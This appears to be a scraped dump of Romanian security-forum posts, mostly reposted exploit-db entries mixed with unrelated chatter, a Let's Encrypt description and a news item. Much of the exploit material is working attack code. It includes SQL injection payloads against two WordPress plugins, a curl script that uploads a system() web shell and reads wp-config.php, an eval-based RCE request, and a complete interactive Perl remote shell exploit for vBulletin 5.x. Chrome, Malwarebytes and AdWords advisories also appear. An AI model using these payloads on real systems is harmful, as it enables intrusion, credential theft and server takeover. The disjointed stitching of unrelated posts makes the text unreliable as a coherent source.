Massaro

Exploit Title : wordpress poll widget version 1.0.7 SQL Injection vulnerability Author : WICS Date : 7/12/2015 Software Link : https://wordpress.org/plugins/polls-widget/ Affected Version: 1.0.7 and below Overview: Poll widget is wordpress plugin which provide fancy user Polling layout to website users and user can vote according to options provided in specific poll. This plugin has 2000+ active installations. Vulnerability exist in front_end.php file in which code is not filtering user supplied data on parameter question_id line no. 36 $question_id=$_POST['question_id']; .... .... line no. 94--> $answer=$wpdb->get_results('SELECT `answer_name`,`vote` FROM '.$wpdb->prefix.'polls WHERE question_id='.$question_id,ARRAY_A); print_r(json_encode($answer, JSON_FORCE_OBJECT)); this script is vulnerable to union based sql injection with column count 2 POC http://localhost/wp-admin/admin-ajax.php?action=pollinsertvalues in post data, add this question_id=1337 union select group_concat(0x7e,(select(@)from(select(@:=0x00),(select(@)from(information_schema.tables)where table_schema=database() and (@)in(@:=concat(@,0x3C62723E,table_name))))a)),2-- -&poll_answer_securety=4ac4f387e2&date_answers[0]=5 Sursa: https://www.exploit-db.com/exploits/38902/.

Exploit Title : PHP utility belt Remote Code Execution vulnerability Author : WICS Date : 8/12/2015 Software Link : https://github.com/mboynes/php-utility-belt Overview: PHP utility belt is a set of tools for PHP developers. Install in a browser-accessible directory and have at it. ajax.php is accessible without any authentication Vulnerable code (Line number 12 to 15) if ( isset( $_POST['code'] ) ) { if ( false === eval( $_POST['code'] ) ) echo 'PHP Error encountered, execution halted'; } POC Access URL http://127.0.0.1/php-utility-belt/ajax.php in Post data type code=fwrite(fopen('info.php','w'),'<?php echo phpinfo();?>'); above code will generate info.php file which will display php info Shell link will be http://127.0.0.1/php-utility-belt/info.php Sursa: https://www.exploit-db.com/exploits/38901/.

########################################### #-----------------------------------------# #[ 0-DAY Aint DIE | No Priv8 | KedAns-Dz ]# #-----------------------------------------# # *----------------------------* # # K |....##...##..####...####....| . # # h |....#...#........#..#...#...| A # # a |....#..#.........#..#....#..| N # # l |....###........##...#.....#.| S # # E |....#.#..........#..#....#..| e # # D |....#..#.........#..#...#...| u # # . |....##..##...####...####....| r # # *----------------------------* # #-----------------------------------------# #[ Copyright (c) 2015 | Dz Offenders Cr3w]# #-----------------------------------------# ########################################### # >> D_x . Made In Algeria . x_Z << # ########################################### # # [>] Title : Wordpress Plugin Advanced uploader v2.10 Multiple Vulnerabilities # # [>] Author : KedAns-Dz # [+] E-mail : ked-h (@hotmail.com) # [+] FaCeb0ok : fb.me/K3d.Dz # [+] TwiTter : @kedans # # [#] Platform : PHP / WebApp # [+] Cat/Tag : File Upload / Code Exec / Disclosure # # [<] <3 <3 Greetings t0 Palestine <3 <3 # [!] Vendor : http://www.wordpress.org # ########################################### # # [!] Description : # # Wordpress plugin Advanced uploader v2.10 is suffer from multiple vulnerabilities # remote attacker can upload file/shell/backdoor and exec commands or disclosure some local files. # #### <?php // page : upload.php // lines : 1030... 1037 $postData = array(); $postData['file'] = "@k3d.php"; /* k3d.php : <?php system($_GET["dz"]); ?> */ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http:/[target].com/wp-content/plugins/advanced-uploader/upload.php"); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $postData ); $buf = curl_exec ($ch); curl_close($ch); unset($ch); echo $buf; ?> ################## <?php // page : upload.php // lines : 1219... 1237 $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://$[target].com/wp-content/plugins/advanced-uploader/upload.php?destinations=../../../../../../../../../wp-config.php%00"); curl_setopt($ch, CURLOPT_HTTPGET, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); $buf = curl_exec ($ch); curl_close($ch); unset($ch); echo $buf; ?> #### # <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE !> # Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3 #--------------------------------------------------------------- # Greetings to my Homies : Meztol-Dz , Caddy-Dz , Kalashinkov3 , # Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic, # & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , & # & KnocKout , Angel Injection , The Black Divels , kaMtiEz , & # & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, & # & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day & # PacketStormSecurity * Metasploit * OWASP * OSVDB * CVE Mitre ; #### Sursa: https://www.exploit-db.com/exploits/38867/.

Cand doua topicuri au acelasi nume, ia userii de la ambele topicuri? (ex: 1 si 2)

Link: https://letsencrypt.org/ About: Let’s Encrypt is a free, automated, and open certificate authority (CA), run for the public’s benefit. Let’s Encrypt is a service provided by the Internet Security Research Group (ISRG). The key principles behind Let’s Encrypt are: Free: Anyone who owns a domain name can use Let’s Encrypt to obtain a trusted certificate at zero cost. Automatic: Software running on a web server can interact with Let’s Encrypt to painlessly obtain a certificate, securely configure it for use, and automatically take care of renewal. Secure: Let’s Encrypt will serve as a platform for advancing TLS security best practices, both on the CA side and by helping site operators properly secure their servers. Transparent: All certificates issued or revoked will be publicly recorded and available for anyone to inspect. Open: The automatic issuance and renewal protocol will be published as an open standard that others can adopt. Cooperative: Much like the underlying Internet protocols themselves, Let’s Encrypt is a joint effort to benefit the community, beyond the control of any one organization.

##################################################################################### Application: Malwarebytes Antivirus Platforms: Windows Versions: 2.2.0. CVE: No CVE have been assigned Author: Francis Provencher of COSIG Twitter: @cosiG_ ##################################################################################### 1) Introduction 2) Report Timeline 3) Technical details 4) POC ##################################################################################### =============== 1) Introduction =============== Malwarebytes Anti-Malware (MBAM) is an application for computers running under the Microsoft Windows and Apple OS Xoperating system that finds and removes malware.[3] Made by Malwarebytes Corporation, it was first released in January 2008. It is available in a free version, which scans for and removes malware when started manually, and a paid version, which additionally provides scheduled scans, real-time protection and a flash memory scanner. ([url]http://www.oracle.com/us/technologies/embedded/025613.htm[/url]) ##################################################################################### ============================ 2) Report Timeline ============================ 2015-11-28: Francis Provencher of COSIG found the issue; 2015-11-30: Francis Provencher of COSIG report vulnerability to Malwarebytes; 2015-12-02: Malwarebytes release a patch for this issue; ##################################################################################### ============================ 3) Technical details ============================ When a malformed executable with an invalid integer (-1) in the “SizeOfRawData” in UPX section is parsed by Malwarebytes, a memory corruption occured. Successful exploitation of the vulnerabilities may allow execution of arbitrary code. ##################################################################################### =========== 4) POC [url]https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38858.exe[/url] Sursa: https://www.exploit-db.com/exploits/38858/.

It's working just fine for me. Try direct link.

Am vazut dupa ca esti pe Windows. Instaleaza pip folosind tutorialul de aici si dupa scrie pip install mechanize in cmd. Vezi sa fie in $PATH.

@zeroabsolut pip install mechanize Scuze ca ma bag...

S-a postat. E de apreciat ca ai tradus.

Ad block?

#[+] Title: Vbulletin 5.x - Remote Code Execution Exploit #[+] Product: vbulletin #[+] Vendor: http://vbulletin.com #[+] Vulnerable Version(s): Vbulletin 5.x # # # Author : Mohammad Reza Espargham # Linkedin : https://ir.linkedin.com/in/rezasp # E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com # Website : www.reza.es # Twitter : https://twitter.com/rezesp # FaceBook : https://www.facebook.com/reza.espargham # Special Thanks : Mohammad Emad system(($^O eq 'MSWin32') ? 'cls' : 'clear'); use LWP::UserAgent; use LWP::Simple; $ua = LWP::UserAgent ->new; print "\n\t Enter Target [ Example:http://target.com/forum/ ]"; print "\n\n \t Enter Target : "; $Target=<STDIN>; chomp($Target); $response=$ua->get($Target . '/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:20:"echo%20$((0xfee10000))";}'); $source=$response->decoded_content; if (($source =~ m/4276158464/i)) { $response=$ua->get($Target . '/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:6:"whoami";}'); $user=$response->decoded_content; chomp($user); print "\n Target Vulnerable \n"; while($cmd=="exit") { print "\n\n$user\$ "; $cmd=<STDIN>; chomp($cmd); if($cmd =~ m/exit/i){exit 0;} $len=length($cmd); $response=$ua->get($Target . '/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:'.$len.':"'.$cmd.'";}'); print "\n".$response->decoded_content; } }else{print "\ntarget is not Vulnerable\n\n"}

There's an integer overflow issue in sanity checking section lengths when parsing the vcdiff format (used in SDCH content encoding). This results in the parser parsing outside of sane memory bounds when parsing the contents of a vcdiff window - see attached crash PoC. (/src/sdch/open-vcdiff/src/headerparser.cc) bool VCDiffHeaderParser::ParseSectionLengths( bool has_checksum, size_t* add_and_run_data_length, size_t* instructions_and_sizes_length, size_t* addresses_length, VCDChecksum* checksum) { ParseSize("length of data for ADDs and RUNs", add_and_run_data_length); // <---- user controlled ParseSize("length of instructions section", instructions_and_sizes_length); // <---- user controlled ParseSize("length of addresses for COPYs", addresses_length); // <---- user controlled if (has_checksum) { ParseChecksum("Adler32 checksum value", checksum); } if (RESULT_SUCCESS != return_code_) { return false; } if (!delta_encoding_start_) { VCD_DFATAL << "Internal error: VCDiffHeaderParser::ParseSectionLengths " "was called before ParseWindowLengths" << VCD_ENDL; return_code_ = RESULT_ERROR; return false; } const size_t delta_encoding_header_length = UnparsedData() - delta_encoding_start_; if (delta_encoding_length_ != (delta_encoding_header_length + *add_and_run_data_length + *instructions_and_sizes_length + *addresses_length)) { // <---- Integer overflow here (32-bit systems only) VCD_ERROR << "The length of the delta encoding does not match " "the size of the header plus the sizes of the data sections" << VCD_ENDL; return_code_ = RESULT_ERROR; return false; } return true; } These returned lengths are subsequently used to initialise length-checked buffer objects for continuing the parsing (vcdecoder.cc:1024) size_t add_and_run_data_length = 0; size_t instructions_and_sizes_length = 0; size_t addresses_length = 0; if (!header_parser->ParseSectionLengths(has_checksum_, &add_and_run_data_length, &instructions_and_sizes_length, &addresses_length, &expected_checksum_)) { return header_parser->GetResult(); } if (parent_->AllowInterleaved() && // snip... } else { // If interleaved format is not used, then the whole window contents // must be available before decoding can begin. If only part of // the current window is available, then report end of data // and re-parse the whole header when DecodeChunk() is called again. if (header_parser->UnparsedSize() < (add_and_run_data_length + instructions_and_sizes_length + addresses_length)) { return RESULT_END_OF_DATA; } data_for_add_and_run_.Init(header_parser->UnparsedData(), add_and_run_data_length); instructions_and_sizes_.Init(data_for_add_and_run_.End(), instructions_and_sizes_length); addresses_for_copy_.Init(instructions_and_sizes_.End(), addresses_length); This issue only affects 32-bit builds, since ParseSize is parsing a positive int32_t; on 64-bit builds it cannot be large enough to wrap a size_t. It's unclear if this is exploitable as a browser-process infoleak; the results of SDCH decoding will be returned to a renderer process, but the way that the returned values are used mean that it is likely that the process will have to survive reads at opposite ends of the address space, which *should* be guaranteed to crash with a 2:2 address space split. It is possible that on 32-bit Windows with a 1:3 address space split this can be survived, or with careful crafting of the input file these reads can be avoided; I've not investigated further at this point. It appears to be necessary to host the PoC on a legitimate domain; as localhost is not supported for SDCH. VERSION Chrome Version: 47.0.2499.0 Operating System: Linux x86 REPRODUCTION CASE Please include a demonstration of the security bug, such as an attached HTML or binary file that reproduces the bug when loaded in Chrome. PLEASE make the file as small as possible and remove any content not required to demonstrate the bug. FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION Type of crash: browser Crash State: eax 0xf9ae8a78 -106001800 ecx 0xe7502d43 -414175933 edx 0x7b83e020 2072240160 ebx 0xf76597a0 -144336992 esp 0xe75025d0 0xe75025d0 ebp 0xe7502798 0xe7502798 esi 0x5 5 edi 0xf9061200 -117042688 eip 0xf1ddebee 0xf1ddebee <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+94> eflags 0x210a93 [ CF AF SF IF OF RF ID ] cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x63 99 => 0xf1ddebee <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+94>: movzbl (%edx),%ecx 0xf1ddebf1 <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+97>: mov (%edi),%esi 0xf1ddebf3 <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+99>: cmpb $0x0,0x100(%esi,%ecx,1) 0xf1ddebfb <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+107>: je 0xf1ddec06 <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+118> 0xf1ddebfd <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+109>: movsbl %cl,%edx #0 open_vcdiff::VCDiffCodeTableReader::GetNextInstruction (this=0xf9061200, size=0x5, mode=0xf9ae8a78 " \340\203{Ox\a\376\001") at ../../sdch/open-vcdiff/src/decodetable.cc:78 #1 0xf1ddcab5 in open_vcdiff::VCDiffDeltaFileWindow::DecodeBody (this=0xf90611c4, parseable_chunk=<optimized out>) at ../../sdch/open-vcdiff/src/vcdecoder.cc:1231 #2 0xf1ddbc8b in open_vcdiff::VCDiffDeltaFileWindow::DecodeWindow (this=0xf90611c4, parseable_chunk=0xe75031a8) at ../../sdch/open-vcdiff/src/vcdecoder.cc:1359 #3 0xf1ddb6f0 in open_vcdiff::VCDiffStreamingDecoderImpl::DecodeChunk (this=0xf90611b0, data=<optimized out>, len=<optimized out>, output_string=0x8) at ../../sdch/open-vcdiff/src/vcdecoder.cc:887 #4 0xf1ddd499 in open_vcdiff::VCDiffStreamingDecoder::DecodeChunkToInterface (this=0x8b, data=0xe7503300 "8\026B\367\030'\317", <incomplete sequence \371\226>, len=3880792832, output_string=0xf76597a0 <_GLOBAL_OFFSET_TABLE_>) at ../../sdch/open-vcdiff/src/vcdecoder.cc:1393 #5 0xf1d2b17f in DecodeChunk<std::basic_string<char> > (this=0x7b83e020, data=<optimized out>, len=3880791363, output=<optimized out>) at ../../sdch/open-vcdiff/src/google/vcdecoder.h:83 #6 net::SdchFilter::ReadFilteredData (this=0xf9cf26e0, dest_buffer=0xd2ce0000 "", dest_len=<optimized out>) at ../../net/filter/sdch_filter.cc:424 #7 0xf1d28990 in net::Filter::ReadData (this=0xf9cf26e0, dest_buffer=0x7b83e020 <error: Cannot access memory at address 0x7b83e020>, dest_len=0xe75033c8) at ../../net/filter/filter.cc:131 #8 0xf1d2895c in net::Filter::ReadData (this=0xfd6b7c00, dest_buffer=<optimized out>, dest_len=0xe75033c8) at ../../net/filter/filter.cc:145 #9 0xf1ca8dde in net::URLRequestJob::ReadFilteredData (this=0xf9891a00, bytes_read=<optimized out>) at ../../net/url_request/url_request_job.cc:673 #10 0xf1ca8c1d in net::URLRequestJob::Read (this=0xf9891a00, buf=<optimized out>, buf_size=<optimized out>, bytes_read=0xe75034fc) at ../../net/url_request/url_request_job.cc:126 Source: here. PoC: here.

Hackers have found a new way to hack your Android smartphone and remotely gain total control of it, even if your device is running the most up-to-date version of the Android operating system. Security researcher Guang Gong recently discovered a critical zero-day exploit in the latest version of Chrome for Android that allows an attacker to gain full administrative access to the victim's phone and works on every version of Android OS. The exploit leverages a vulnerability in JavaScript v8 engine, which comes pre-installed on almost all (Millions) modern and updated Android phones. All the attacker needs to do is tricking a victim to visit a website that contains malicious exploit code from Chrome browser. Once the victim accessed the site, the vulnerability in Chrome is exploited to install any malware application without user interaction, allowing hackers to gain remotely full control of the victim’s phone. This Chrome for Android zero-day exploit was practically demonstrated by Gong in a hacking contest MobilePwn2Own during the 2015 PacSec conference in Tokyo. Complete technical details on the exploit are not available yet, but the researcher has already alerted Google to the bug, and the company is expected to pay out a sizeable bug bounty for the exploit. Source: here.

Salut, Poti incerca niste cursuri interactive: Codeacademy. Learn python. Carti: The Hitchhiker’s Guide to Python. Learn Python The Hard Way. La fel, poti incerca cursul de la Google: Google's Python Class.

# Exploit Title: WP Fastest Cache 0.8.4.8 Blind SQL Injection # Date: 11-11-2015 # Software Link: https://wordpress.org/plugins/wp-fastest-cache/ # Exploit Author: Kacper Szurek # Contact: http://twitter.com/KacperSzurek # Website: http://security.szurek.pl/ # Category: webapps 1. Description For this vulnerabilities also WP-Polls needs to be installed. Everyone can access wpfc_wppolls_ajax_request(). $_POST["poll_id"] is not escaped properly. File: wp-fastest-cache\inc\wp-polls.php public function wpfc_wppolls_ajax_request() { $id = strip_tags($_POST["poll_id"]); $id = mysql_real_escape_string($id); $result = check_voted($id); if($result){ echo "true"; }else{ echo "false"; } die(); } http://security.szurek.pl/wp-fastest-cache-0848-blind-sql-injection.html 2. Proof of Concept <form method="post" action="http://wordpress-url/wp-admin/admin-ajax.php?action=wpfc_wppolls_ajax_request"> <input type="text" name="poll_id" value="0 UNION (SELECT IF(substr(user_pass,1,1) = CHAR(36), SLEEP(5), 0) FROM `wp_users` WHERE ID = 1) -- "> <input type="submit" value="Send"> </form> 3. Solution: Update to version 0.8.4.9

# Date: 06.11.2015 # Title: Google AdWords API PHP client library <= 6.2.0 Arbitrary PHP Code Execution # Exploit Author: Dawid Golunski # Vendor Homepage: https://developers.google.com/adwords/api/docs/clientlibraries # Software Link: https://github.com/googleads/googleads-php-lib # Version: <=6.2.0 ============================================= - Release date: 06.11.2015 - Discovered by: Dawid Golunski - Severity: Medium/High ============================================= I. VULNERABILITY ------------------------- Google AdWords API PHP client library <= 6.2.0 Arbitrary PHP Code Execution (googleads-php-lib) II. BACKGROUND ------------------------- - AdWords API https://developers.google.com/adwords/api/docs/ "The AdWords API is a collection of web services that you can use to build applications that manage AdWords accounts and their associated campaign data. While the AdWords API is based on SOAP 1.1, high-level client libraries are provided to help you develop applications more quickly." AdWords API client libraries are available for different platforms such as PHP, .NET, Java etc. These can be found at: https://developers.google.com/adwords/api/docs/clientlibraries III. INTRODUCTION ------------------------- The Google AdWords API client library for PHP contains a WSDL Interpreter class which is described in a comment within the source code as: " * The main class for handling WSDL interpretation. * * The WSDLInterpreter is utilized for the parsing of a WSDL document for rapid * and flexible use within the context of PHP 5 scripts. " The class contains a function savePHP() which allows to convert the WSDL document received from a remote end into a PHP file. The funcion is vulnerable to Path Traversal and Code Execution vulnerabilities. IV. DESCRIPTION ------------------------- googleads-php-lib contains the following function which is meant to load WSDL document (XML data) from a remote Google AdWords server: ---[ build_lib/WSDLInterpreter/WSDLInterpreter.php ]--- protected function loadWsdl($wsdlUri, $proxy = null) { // Set proxy. if ($proxy) { $opts = array( 'http' => array( 'proxy' => $proxy, 'request_fulluri' => true ) ); $context = stream_context_get_default($opts); libxml_set_streams_context($context); } $this->dom = new DOMDocument(); $this->dom->load($wsdlUri, LIBXML_DTDLOAD|LIBXML_DTDATTR|LIBXML_NOENT|LIBXML_XINCLUDE); ------------------------------------------------------- For security reasons Google AdWords API should only be accessed via HTTPS. However, the above code does not set appropriate SSL settings on the https:// stream context. It fails to assign Certificate Authority (CA), turn the verify_peer option to ON, specify allowed ciphers etc. It uses the stream_context_get_default() function to get the default context, which on all PHP versions below PHP 5.6.x (see references), does not validate the CA by default. Because of this, application may retrieve data from untrusted sources pretending to be adwords.google.com. Further on, the WSDLInterpreter class contains the following savePHP function: ---[ build_lib/WSDLInterpreter/WSDLInterpreter.php ]--- /** * Saves the PHP source code that has been loaded to a target directory. * * Services will be saved by their validated name, and classes will be * included with each service file so that they can be utilized independently. * * @param array $options Options for the SoapClient */ public function __construct($wsdl, $options, $user) { $options["classmap"] = self::$classmap; parent::__construct($wsdl, $options, $user, self::SERVICE_NAME, self::WSDL_NAMESPACE); } } } ---------------------------------------- If such class gets included it will execute the malicious code due to the injected __destruct() method, which creates /tmp/adwrods_api_hacked file. At this point the attacker can control the name of the class (through service name), the path to the resulting PHP file, and is also able to inject any PHP code. Going further, He could also close the class definition statement and write an arbitrary PHP code in the main file. This would allow the attacker to create a stand alone script which he could request remotely via the Web server if he managed save it within the web root. In this way the attacker could create a stand alone PHP command shell and get access to the system. VI. BUSINESS IMPACT ------------------------- The severity of this issue is lowered to medium/high as despite the possibility to execute arbitrary code, the attacker must impersonate adwords.google.com server to be able to inject malicious XML. If there is a possibility for such an attack, the severity of the issue can grow to high/critical. VII. SYSTEMS AFFECTED ------------------------- Google AdWords API PHP client library in versions up to 6.2.0 contain the vulnerable WSDLInterpreter code. VIII. SOLUTION ------------------------- Upgrade Google AdWords API PHP client library to the latest version. IX. REFERENCES ------------------------- This advisory: [url]http://legalhackers.com/advisories/Google-AdWords-PHP-Client-library-PHP-Code-Execution.txt[/url] Related, Google AdWords API client libraries - XML eXternal Entity Injection (XXE) vuln: [url]http://legalhackers.com/advisories/Google-AdWords-API-libraries-XXE-Injection-Vulnerability.txt[/url] [url]https://github.com/googleads/googleads-php-lib[/url] [url]https://github.com/googleads/googleads-php-lib/blob/master/ChangeLog.md[/url] [url]https://developers.google.com/adwords/api/docs/[/url] [url]https://developers.google.com/adwords/api/docs/clientlibraries[/url] PHP 5.6.x openssl certificates in PHP streams: [url]http://php.net/manual/en/migration56.openssl.php[/url] X. CREDITS ------------------------- The vulnerability has been discovered by Dawid Golunski dawid (at) legalhackers (dot) com [url]http://legalhackers.com[/url] XI. REVISION HISTORY ------------------------- May 18th, 2015: Advisory created and sent to Google Security Team Nov 5th, 2015: Google, after half a year, confirm the vulnerability has been patched Nov 6th, 2015: Advisory released publicly XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. .